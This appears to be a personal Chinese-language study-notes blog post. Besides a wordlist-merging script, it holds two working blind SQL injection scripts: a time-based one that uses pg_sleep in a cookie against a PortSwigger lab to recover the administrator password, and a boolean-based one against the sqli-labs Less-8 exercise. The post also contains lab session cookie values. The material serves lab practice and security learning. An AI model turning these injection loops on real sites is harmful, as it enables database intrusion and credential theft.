python学习

python学习笔记

1.使用python脚本整合目录扫描字典

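# Merge the entries of ./1.txt into ./2.txt, appending only the entries that
# ./2.txt does not already contain (used here to combine wordlists).
#
# "a+" opens the file for reading and appending: it is created if missing and
# every write lands at the end of the file, whatever the read position is.
with open("./2.txt", "a+") as f:
    # In "a+" mode the position starts at end-of-file, so a read without
    # rewinding returns nothing and no duplicate would ever be detected.
    f.seek(0)

    seen = set()
    needs_newline = False
    for existing in f:
        # Compare entries without the line terminator so that a final line
        # lacking "\n" still matches the same entry in the other file.
        seen.add(existing.rstrip("\n"))
        needs_newline = not existing.endswith("\n")

    # Keep the first appended entry from being glued onto an unterminated
    # last line of ./2.txt.
    if needs_newline:
        f.write("\n")

    with open("./1.txt") as src:
        for line in src:
            entry = line.rstrip("\n")
            if entry not in seen:
                f.write(entry + "\n")
                # Remember it so a repeat inside ./1.txt is written only once.
                seen.add(entry)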

2.burp靶场cookie-sql注入时间盲注脚本

import requests

# Character-by-character extraction loop written for a Web Security Academy
# lab. Every request appends a conditional-delay SQL fragment to the
# TrackingId cookie and prints the candidate character when the response
# reason is anything other than 'OK'.
#
# The fragment only has an effect if the application builds its SQL statement
# by concatenating the raw cookie value; with a parameterized query the whole
# cookie is treated as data. On the server side this traffic is recognisable
# by Cookie headers that carry SQL keywords such as pg_sleep.
url = 'https://0a03004a034fb137c4f82c9500f4000c.web-security-academy.net/'

# Candidate characters tried at each position: digits, then lower case, then
# upper case.
charset = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

# URL-encoded fragment; the two {} slots receive the character position and
# the candidate character.
template = "'%3bselect+case+when+(username='administrator'+and+SUBSTRING(password,{},1)='{}')+then+pg_sleep(10)+else+pg_sleep(0)+end+from+users--"

headers = {
    "Host": "0a03004a034fb137c4f82c9500f4000c.web-security-academy.net",
    # Initial value only: it is overwritten below before any request is sent.
    "Cookie": "session=2mfZwsZHlmyYL2mwPlK0e34AEA021iz7;TrackingId=Y7quZz53LMWRIZbA"
}

# Cookie actually sent; the formatted fragment is appended to the TrackingId.
# NOTE(review): these look like per-instance lab session values - confirm they
# are not reused anywhere else before keeping them in published notes.
cookie_prefix = 'session=w3v9123vZW4IJxuNRuqJBOJ86sbLcmNb;TrackingId=i1NjLmRNA1lXR2pZ'

for position in range(20):
    for candidate in charset:
        headers["Cookie"] = cookie_prefix + template.format(position, candidate)
        response = requests.get(url, headers=headers, timeout=1)
        # The script's signal is the HTTP reason phrase, not a measured delay.
        if str(response.reason) != 'OK':
            print(candidate, end='')

3.sqli 简单盲注脚本

import requests
# Boolean-based blind extraction loop for the Less-8 exercise at the URL
# below. Each request appends a condition to the id parameter and treats the
# text "You are in" in the response body as "condition true", printing the
# candidate character that produced it.
#
# The approach depends on the id parameter being concatenated into the SQL
# statement and on the page rendering differently for true and false
# conditions; binding id as a query parameter removes the first precondition.

# Condition template; the {} slots receive the position and the candidate.
probe = 'and if(substring(user(),{},1)="{}",1,0)--+'

# Request prefix that ends inside the quoted id value.
base = "http://192.168.90.45/sql/Less-8/?id=1'"

# Only lower-case letters are tried.
letters = 'abcdefghijklmnopqrstuvwxyz'

for pos in range(5):
    for ch in letters:
        reply = requests.get(url=base + probe.format(pos, ch))
        if "You are in" in reply.text:
            print(ch, end='')


作者
QY
发布于
2022年11月18日